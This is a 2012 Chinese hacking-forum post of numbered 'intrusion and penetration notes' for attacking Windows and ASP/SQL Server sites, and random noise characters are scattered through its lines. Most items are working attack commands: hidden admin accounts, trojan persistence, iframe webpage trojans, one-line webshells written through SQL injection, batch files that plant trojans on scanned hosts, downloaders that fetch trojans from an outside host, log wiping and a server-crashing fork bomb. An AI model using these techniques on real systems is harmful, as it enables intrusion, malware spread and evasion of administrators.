找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2152|回复: 0
打印 上一主题 下一主题

入侵渗透笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:13:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,6 C9 R  _/ B$ y+ Y7 \5 l5 M
cacls C:\windows\system32 /G hqw20:R  [' f0 Q* N% D# @% T
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
& z) f( `" u( I* S8 W1 m: X恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F4 i& t2 [' r% O! D, z
3 H' i# p9 B) p3 W; P
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
: W& C( A! Z1 w' ^5 P: v! p. _0 Q/ k  @% B! l1 P) S- V& u0 k9 L
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& ?, Y0 I8 _+ [3 j( n. m) l) X$ x

: T# c5 d, D8 E: I4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- U; M+ D7 D: J; {- D; [- [9 M$ v; v' V8 z! N6 v7 o8 E/ V0 K: O
5、利用INF文件来修改注册表* V. E  D: j0 I# Y1 H9 L" Y( j
[Version]
, P4 }: P6 N% p. k- kSignature="$CHICAGO$"- W! ~0 s$ @- W) E" b* y
[Defaultinstall]
  {  Q, E0 ]3 m' V8 waddREG=Ating* E& b: f* d& C5 q% C' d* Q% ?
[Ating]$ g9 ]- a. W7 G' x2 {; T7 v+ N
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"- B' d* q# r2 D
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
8 x+ W7 k( ]4 r) A2 x& m# grundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
* V8 v$ U. ^* Y/ ]9 O$ q2 e其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
* C  ]. ?4 W  E) b  C6 W* qHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU; @0 s6 g0 A! [: l4 `$ C
HKEY_CURRENT_CONFIG 简写为 HKCC% g4 ?0 y+ ^+ _. W/ t
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
; ^; ?* l) \# i$ g; d! T"1"这里代表是写入或删除注册表键值中的具体数据
( b8 l2 r0 ]* t/ J
7 x) P$ l  w9 C9 r, A6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,3 ?3 k6 C2 m+ e3 l. L& r0 \9 C7 Q
多了一步就是在防火墙里添加个端口,然后导出其键值/ Z5 V3 L& K+ x  p# O
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]5 d4 ]7 Z! W1 G' G! L

5 {# T) O7 t; Q8 q+ D7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
; ?; \& F/ k) j/ ?& A$ H在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。5 w% i1 d: n+ Y+ b- d

. x3 B/ o: {8 w8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 y6 C5 m3 M2 Z4 C
# x8 C; {0 c2 S0 _% A+ X! h" p
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
! b7 M" _* n5 M# @  y+ w5 K9 O: y4 _可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
# ]+ r4 i7 X5 l7 o9 {2 J* S# e; C6 v7 r4 b( d. F# H/ ^4 j
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
1 c; w3 b3 Q. r+ u) O# [, }* s6 V
) u/ r* l* B8 |11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
% @- R) ]3 G& K$ t用法:xsniff –pass –hide –log pass.txt
9 z! n6 ?) k6 Z8 `
0 L9 v. L2 A0 Z' G$ h% H12、google搜索的艺术1 L" }& ?7 c, r, \- C
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ R0 o) J8 B2 {( }" C, w或“字符串的语法错误”可以找到很多sql注入漏洞。
9 e! j" Z" h1 E6 |
  s4 `# f& j. ]9 T- u  `3 w) o13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。" L4 Q+ G2 r+ B' e% t7 V8 @# _2 x

8 z# E" c; Y# m2 {% k14、cmd中输入 nc –vv –l –p 1987+ M& \0 v. ^4 T. Z0 V
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 g- k% D) h8 I3 U

" D" ?' g& h" G' @/ j. p15、制作T++木马,先写个ating.hta文件,内容为3 F9 M# \7 k" j0 r, S+ y% d
<script language="VBScript">  F3 e- ^% {, p0 _) |
set wshshell=createobject ("wscript.shell" )" ~# Z+ g2 H/ I
a=wshshell.run("你马的名称",1)2 q7 w0 W* r: Q. A
window.close# t9 A1 [# r$ a9 ?
</script>4 M5 c, R6 u* m% u0 w: ~3 f+ c
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
; _% q" ?7 _. n, d' c5 H$ g# z' j' b8 [) R0 C! a& l
16、搜索栏里输入  j  S1 H6 L8 I3 z/ K$ \8 z
关键字%'and 1=1 and '%'='
; d# Q9 R5 p0 D  _关键字%'and 1=2 and '%'='  e3 r5 n" e# B& {! N9 @: y
比较不同处 可以作为注入的特征字符
& W) n# T8 F: G9 l$ r. @9 R  s2 P
. W: A/ B1 j3 U+ G$ C8 j& U- D' q17、挂马代码<html>
5 u9 ^. T5 l& s& A) \<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
  U+ L: c9 j/ @2 ]# D</html>9 u% y5 j3 N  J
* _$ T5 Q' U9 [
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,7 F) w' e2 N6 t/ Z( a* B3 w
net localgroup administrators还是可以看出Guest是管理员来。
* r- Q! p, t8 J- A5 G' _+ N
7 U5 E$ O  S: s! W19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 k5 |8 S% t) j6 `- Q用法: 安装: instsrv.exe 服务名称 路径
8 {4 @1 T1 B4 a) Z3 `" A6 O+ `卸载: instsrv.exe 服务名称 REMOVE
7 Z4 |2 z" W% {8 H; h5 p* R0 R! @8 K; d$ N2 y8 [
6 j6 J  X+ \6 N- y+ t, ]% e
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉. G; K& p6 u* d  k) ]1 v+ h
不能注入时要第一时间想到%5c暴库。% x; @$ M* E! J5 F. S# t1 ?4 ]

, Q. S/ k' |" R5 Z22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
& g' l" ~' p) b, m- S* A
) p7 _7 v" I7 _' K! V/ h23、缺少xp_cmdshell时6 A5 Q5 S1 Z6 H! K/ A
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'5 _& g/ Q) W% k2 ?( F8 B5 ~/ h. \  o4 d
假如恢复不成功,可以尝试直接加用户(针对开3389的)
! j+ D! _' `  O0 p' w- O2 v3 Ddeclare @o int; \5 D7 ]# Q+ @( i4 D; s! w, }
exec sp_oacreate 'wscript.shell',@o out0 x1 F4 @1 w) k1 L
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员+ h( z: `4 V! X4 [" K% A# i& e
4 m% m$ g# @/ n% L2 z
24.批量种植木马.bat6 S8 q' P. g" A( N2 o& @
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
/ t2 r9 D3 C+ c& xfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
9 I6 k4 |) e: O! c9 m; ]扫描地址.txt里每个主机名一行 用\\开头
# G% g, v7 a8 O* E+ A8 |) Z: X4 ^  A6 \8 m9 _
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。' b3 E1 x: u) i! S' Z  q; v

& L7 X4 X9 W* G26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.0 u4 k( \0 o, i
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 d) t! `1 a5 I, \.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
" g& y3 s" ~( }/ i/ o: `' ]" u! e3 q' @  D# w
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP+ B$ y$ G: Q+ a+ V! y0 l
然后用#clear logg和#clear line vty *删除日志5 o: ?! d3 J( ?) E& H3 ~2 M" f7 B

" r5 d; M! I1 m, D+ p7 t' H, y28、电脑坏了省去重新安装系统的方法) g4 |" A* e( c5 n- @
纯dos下执行,
, @9 P& R; Y$ t9 \2 v$ H. Bxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config$ M! Q. O: T) v. H
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
$ n/ ?; q1 E1 j6 s4 E$ v
1 i( \7 E  ]' q6 ]4 M29、解决TCP/IP筛选 在注册表里有三处,分别是:
, y0 Z3 P5 q$ Q1 wHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip. o5 l. J' X  f7 D* ~" L/ c7 e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
; E  C- @9 P% w( f# C8 D/ g9 b7 ]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 t  j# d5 g8 L( }( _- _2 C分别用/ m; {/ ?. b: ?7 o: a
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: c9 L$ Z  e  K" M- i6 I
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip0 ?1 G: ]1 r" `& {1 `# G
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* E! F: S* }2 Z3 j- ^1 S
命令来导出注册表项/ y" a4 V, e0 F& c9 Y7 u
然后把三个文件里的EnableSecurityFilters"=dword:00000001,% |" V. c$ v% f  d4 {5 y) h
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
* W  g6 _5 Q/ i2 Q+ Fregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
0 x: ~9 H* w' z$ ?$ V5 ~& F8 Z" v6 J) m& G
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
2 F$ W4 c/ M, w2 z( KSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
  m9 i+ A- f3 S+ W# ~8 ~
. D3 }/ W& j  S9 c8 i31、全手工打造开3389工具0 }4 D4 |, i8 ^! X9 ^2 N4 ~
打开记事本,编辑内容如下:
! V! Z) T- ]' B- V. y# w/ {echo [Components] > c:\sql4 X/ g; u. F0 z5 B, P
echo TSEnable = on >> c:\sql
# i/ I) g) Z- x& q( U6 Zsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 L1 O) x3 a; c: h编辑好后存为BAT文件,上传至肉鸡,执行
  Y: {3 E: q# i. W, [$ }  Y. `7 }8 v8 p$ [& H+ j, i0 ?
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
  Z  `2 G3 O, t4 m; S+ r5 j( v5 B8 J# Z" |4 r8 f" d1 x, ~
33、让服务器重启5 a9 ~' `% w9 U  D* \- l% \  y& U- d
写个bat死循环:2 Q( Q& R: |! v: J  T
@echo off
3 u" ^# s0 Q/ ^( T5 A6 Z# n:loop1
! d) z6 o. ^4 O8 H  y. Rcls
# E) Q( r/ U! c8 E- O' ]# Qstart cmd.exe. k1 q  l! `/ h4 h9 Z
goto loop12 A/ p# ~/ S0 R" j( J9 y
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
+ G/ Y1 j1 L. E0 L; r; K! x
3 S5 G% _1 t! T- @: C, Z& P34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
' W! S' w2 m/ T2 s/ K@echo off6 l% g  H) X: R4 p. W" S/ P
date /t >c:/3389.txt
( ~) @, E5 N  p$ `% atime /t >>c:/3389.txt
5 w% g( U5 s" f! W% ~* ~attrib +s +h c:/3389.bat  D3 P4 H3 Q- x. H/ |
attrib +s +h c:/3389.txt
$ L8 W8 s) I. `  dnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt: Z% Z8 _' s6 w3 g
并保存为3389.bat$ K, Y) A- d; s; j" ]
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号4 G1 h0 h( M0 O# ?, Q

7 q9 J. ~3 X4 k9 E35、有时候提不了权限的话,试试这个命令,在命令行里输入:
) o# W: w1 n+ f$ U5 ], g5 wstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
  T7 a# F' r  u输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。" `+ `) w+ B/ R5 K3 w8 d, {6 S, `
2 ~+ i4 W3 Q' P# h/ Z3 ]0 T
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件& m5 p: U; s1 k$ D5 n
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
/ b: f2 b  @, }* v: `echo 你的FTP账号 >>c:\1.bat //输入账号9 E, _6 f* _- F+ d4 G' G
echo 你的FTP密码 >>c:\1.bat //输入密码4 }' R0 g8 H) o' S; ]
echo bin >>c:\1.bat //登入
+ N$ ?3 p' a4 |# Eecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 d+ {9 {! [& {6 Uecho bye >>c:\1.bat //退出
, p1 W. q6 h5 T/ J& ?. x然后执行ftp -s:c:\1.bat即可
8 F$ S6 P& Q; q. i7 F* K( k
4 M  @  `% n7 W, X! n1 `37、修改注册表开3389两法
7 g# x$ d, l( y3 o) B% ?# E% {(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表: C* w6 h% P7 n8 O, O& u% C
echo Windows Registry Editor Version 5.00 >>3389.reg
2 _. o3 W+ o2 [9 H/ d/ W( e$ kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg1 N9 `% ?7 r+ B6 s: h+ v
echo "Enabled"="0" >>3389.reg
, [& p1 J+ k* q% S; b. [echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
4 f8 W( V8 a6 j, _NT\CurrentVersion\Winlogon] >>3389.reg. i6 W( W# M1 |& U" [( E& e
echo "ShutdownWithoutLogon"="0" >>3389.reg
" F7 z/ l1 L$ q2 Q# {* i2 R4 x7 mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]; @, m1 g. K  {6 K5 Y
>>3389.reg4 n& |( q" }4 D( r8 B4 t$ M0 |. m
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg5 D2 \$ O# D% e2 v1 n' f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
9 J5 u: K( A$ c1 n- \6 j- b8 w>>3389.reg# E- `9 o# T4 b' r& _
echo "TSEnabled"=dword:00000001 >>3389.reg" X6 }' W3 t8 [! T9 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg2 }9 S4 J1 {+ C" ]' m7 e& A" x
echo "Start"=dword:00000002 >>3389.reg
4 ^" a) N( [+ X' }$ z* O2 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
+ J$ ~; H- g, ~/ g; c>>3389.reg
4 |5 z+ m; d. P3 q/ y- ]echo "Start"=dword:00000002 >>3389.reg9 q% m/ }. b6 q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg& H* p& @$ }- d0 g' y! Z
echo "Hotkey"="1" >>3389.reg) X, {% q  S1 R, }9 J4 }: c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; i1 m4 ~7 T* R- EServer\Wds\rdpwd\Tds\tcp] >>3389.reg
9 U5 g; w/ ]: d* T6 Xecho "PortNumber"=dword:00000D3D >>3389.reg: E4 l- y& H  G/ x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- ~& y# W, H" y: ~  R
Server\WinStations\RDP-Tcp] >>3389.reg
* ~, V2 Z6 W) O$ f; o. Lecho "PortNumber"=dword:00000D3D >>3389.reg2 a- m/ ~) c4 `7 c
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
: m3 `7 }: \4 P" L(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
( U& j8 u5 J4 F( L2 s' }3 c因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效& r' w, d; I- l+ b# n
(2)winxp和win2003终端开启
! M0 a5 P8 j! R用以下ECHO代码写一个REG文件:' D% ^% C* a; L' B
echo Windows Registry Editor Version 5.00>>3389.reg
% I. t1 \, l( \% g6 A' J8 Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( C7 }* w$ X& C8 v4 X0 K( U2 bServer]>>3389.reg/ _  T+ D8 X. Y6 f
echo "fDenyTSConnections"=dword:00000000>>3389.reg
6 O3 ?+ ]( T' M8 ]& vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( O, _  I$ @, O' V
Server\Wds\rdpwd\Tds\tcp]>>3389.reg3 d1 Q! c1 R* b( n) O& x
echo "PortNumber"=dword:00000d3d>>3389.reg0 J1 Z' h* D6 K5 U( e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ ^# f4 I5 }2 }9 g4 d- m) @9 g
Server\WinStations\RDP-Tcp]>>3389.reg* @$ Z  V% \6 Q* |
echo "PortNumber"=dword:00000d3d>>3389.reg/ F4 T! H* ~8 }6 Z) f! U
然后regedit /s 3389.reg del 3389.reg* ]$ y/ [3 L6 }: c* B# {- N- G* I
XP下不论开终端还是改终端端口都不需重启
! Z+ F3 n4 L+ }) @0 U) n$ E! `
* d5 ]9 K, S: Z8 m5 O38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃: q+ [: Y6 c- c9 h- k; H2 Q( b
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'' X& p7 ^# F/ _: X' V1 {8 ~

6 T* d0 s! d6 n% o6 ]4 x39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!% |3 w" t% O% `, W' V5 |
(1)数据库文件名应复杂并要有特殊字符1 I7 y  {. }, h4 d* C& W# Q3 A
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源: P3 h# V' s* J3 L" t
将conn.asp文档中的
2 ?/ x9 }# z0 t9 K( l- eDBPath = Server.MapPath("数据库.mdb")
9 U. H0 I# J3 Iconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
- I/ G" I8 [  y6 |4 Q6 b  p4 U" R! o9 o$ j' \0 n
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
; v6 A9 s4 w4 Q+ N+ c(3)不放在WEB目录里) k/ z2 m1 A- G& o( p, w
  q* O- h9 P2 Z: j' c& O/ j
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉* d  s7 t1 a; K6 g
可以写两个bat文件6 H/ M2 l: [' l* Z% @" K' @! r
@echo off" x0 V% g2 t% m, d9 w; B
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe$ }7 s5 _/ S8 D# l! W
@del c:\winnt\system32\query.exe- {; G; V4 B% l
@del %SYSTEMROOT%\system32\dllcache\query.exe' `$ \. y+ K- x# Y; j
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
! ^& D( g* F! _8 W; ]* b& x. V0 r1 X  u  v& t
@echo off6 B& r$ i3 r/ y) V7 K3 O; L  X3 ]
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
" |3 g9 c/ [$ [9 }* h- H@del c:\winnt\system32\tsadmin.exe
' W7 B- N  h; k( z% d@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex: O( B) X& \  h9 ?

" {% b$ Y0 j- J9 }/ H2 g' i41、映射对方盘符- t. e1 U$ @+ v8 r$ z: I
telnet到他的机器上," u7 V$ f; ^; A9 }1 D7 _8 L8 A
net share 查看有没有默认共享 如果没有,那么就接着运行4 }+ g7 m; Z, ~# k0 i) ]
net share c$=c:1 D1 n( U, p' E4 y; }& g+ t
net share现在有c$( O, t# x- H2 a/ A
在自己的机器上运行
& L0 m! t* C6 ]' b. d) ?net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
) C9 G' R4 g6 L: r! H  t2 V  f( r# k1 Z
42、一些很有用的老知识
  o3 M9 b, Q) s! ~type c:\boot.ini ( 查看系统版本 )1 U. _/ `5 q! Y3 \( \: B
net start (查看已经启动的服务)+ m; \! C9 Z' D- i
query user ( 查看当前终端连接 )
% v: r$ n  p) Q! }8 K1 k$ Nnet user ( 查看当前用户 )/ ^$ q! v3 C' x) c3 J
net user 用户 密码/add ( 建立账号 )' [3 N1 j0 g( y: f4 h, @* ^9 E
net localgroup administrators 用户 /add (提升某用户为管理员)
* H3 m7 G5 j" H" {( r7 A4 Iipconfig -all ( 查看IP什么的 )4 k5 t! u" e5 I5 x; @' x
netstat -an ( 查看当前网络状态 )
8 n5 R% g8 @* g% D! @findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
- r( [- A9 m9 ?) p克隆时Administrator对应1F4
5 Y. g5 [7 k/ V( Y- |guest对应1F5
9 B! @" C5 T2 ]# b8 d' ztsinternetuser对应3E8; ~& k! S- L0 i/ a3 ^7 U- i7 {/ m3 A

* u$ ]$ ?8 @, c$ Z4 w43、如果对方没开3389,但是装了Remote Administrator Service
& B; H) |7 g3 y) r用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接9 [/ E& r" `" c; J7 j
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息; [+ w) i7 j' r( @0 q
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) i+ \* p! T0 a* P# c2 d2 B" {: x" K8 X. B( v0 D' k, J
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)9 l9 E1 `0 C5 ^; E- [( x
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)& v! g! _! _2 ^9 \

) b+ |" [; p* Z" C3 ?45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), U8 `  G1 r, Q/ P  {9 D* I( `
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open( f& P! U8 Z% Q  `- s* d5 b  v
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =5 x) k( c+ g9 W% K( K( _+ G1 M  U7 `
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =1 T& k' V5 \/ h6 R6 E9 v
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs  Q' h4 c; j/ w7 ?
(这是完整的一句话,其中没有换行符)
/ P/ E, M* f# T; w* `( \然后下载:
7 T5 R  R# U. v- l1 r) t7 Tcscript down.vbs http://www.hack520.org/hack.exe hack.exe% T: r( K: M8 _) b$ c" H

0 B& v5 l8 F# ]46、一句话木马成功依赖于两个条件:- @# K  d6 @6 T7 H
1、服务端没有禁止adodb.Stream或FSO组件
" J3 D+ C, p2 g& ^2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。9 I4 p# [- a' X, Y' `5 G) N* Q: f

( V% _+ b: b/ I. R47、利用DB_OWNER权限进行手工备份一句话木马的代码:4 M1 s  ?9 {. }9 _; W
;alter database utsz set RECOVERY FULL--- G2 [% a% P2 x2 a- n! f
;create table cmd (a image)--
  E3 v* C+ H: a  d4 w9 ]* T. N;backup log utsz to disk = 'D:\cmd' with init--
  X- U) ^1 F7 T3 H;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--! }+ V: a3 s1 [$ I# }& N* M. ]
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
3 Q0 @7 }5 O# W9 D& u+ C注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
7 K2 s6 J  h6 X0 |: R: K1 W$ J; a! j, h0 S7 L6 y8 i4 h
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:' g  j% ^9 g* R: k3 }2 V% `' a

: x% R. G: A, x' Z& G用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options0 N6 @) M8 O1 |+ A4 v  c
所有会话用 'all'。
9 S2 T/ o0 F, u6 }* j-s sessionid 列出会话的信息。
/ ]: b) N; t  F/ c' ^) G& _-k sessionid 终止会话。
" u% z# k% ?, U-m sessionid 发送消息到会话。
9 ]% m, w/ `# T# Q* I& M. I' i* t+ `0 G3 K$ N
config 配置 telnet 服务器参数。
5 z; n& w+ ?' I3 ~7 f( A+ s) ]& O: _
common_options 为:
% a$ Q8 A1 k' J" f-u user 指定要使用其凭据的用户
( L- n6 N' S$ Q" r4 z# a, G-p password 用户密码
( m1 a. K# |1 {9 M' n2 N. G$ ~$ E5 z- `+ G" R% p# F
config_options 为:/ A* A$ b* u3 N
dom = domain 设定用户的默认域+ V- d& ?: z+ ^: C9 K
ctrlakeymap = yes|no 设定 ALT 键的映射
" m% X) `# g, S/ A& r- s2 G4 F0 Gtimeout = hh:mm:ss 设定空闲会话超时值4 l/ b9 t1 {+ A$ G* t
timeoutactive = yes|no 启用空闲会话。6 i  H/ K) V; r+ L, k6 d4 m! a* y
maxfail = attempts 设定断开前失败的登录企图数。
) s$ s5 g- M2 q* Y! W' ]7 m9 B$ T' Ymaxconn = connections 设定最大连接数。, A% H8 h1 u4 \5 F9 U2 @1 f
port = number 设定 telnet 端口。, C! \! h+ ]; J6 F- J3 P  D8 w
sec = [+/-]NTLM [+/-]passwd
- a. P& f, C: i+ N! S% S/ ]0 N5 O设定身份验证机构
0 N0 J- a' D+ [* y' Ifname = file 指定审计文件名。) p: W' k7 g3 P
fsize = size 指定审计文件的最大尺寸(MB)。9 j, l) r/ X# \% _! ~
mode = console|stream 指定操作模式。/ m- j6 [# U! ?
auditlocation = eventlog|file|both
7 R& \* m8 J: l7 r3 l1 ?4 j$ ]指定记录地点7 x- |" Z5 v$ i( s7 e& m1 L
audit = [+/-]user [+/-]fail [+/-]admin
! i: |- w  J" i+ a, ~- b# E4 ?2 x" H9 A  s9 E1 O/ n5 e
49、例如:在IE上访问:
* a9 F/ h8 U4 z/ |, L! Owww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' L) Z) i/ b7 u, phack.txt里面的代码是:
4 f9 ~, _& G+ l: [# o1 N<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">6 \# X! A6 d* E  e" F
把这个hack.txt发到你空间就可以了!
0 V' T' N, u+ [1 |+ j这个可以利用来做网马哦!9 t; ^" P( }" E: t8 a" z$ r
) _! Y. E' r' S) L- c5 i+ E: e+ o3 F
50、autorun的病毒可以通过手动限制!
+ l0 A# o8 `% j  ]. ]' t* q4 K/ j% Z1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!& |' {. F: c- K8 ?% _
2,打开盘符用右键打开!切忌双击盘符~
, r; \7 l7 x' J4 p0 m, R+ `  X4 u0 W3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!0 X1 f1 E2 L! m# ]9 @% u

4 Q  D  y3 z5 e7 m$ A/ \" h9 p0 M51、log备份时的一句话木马:
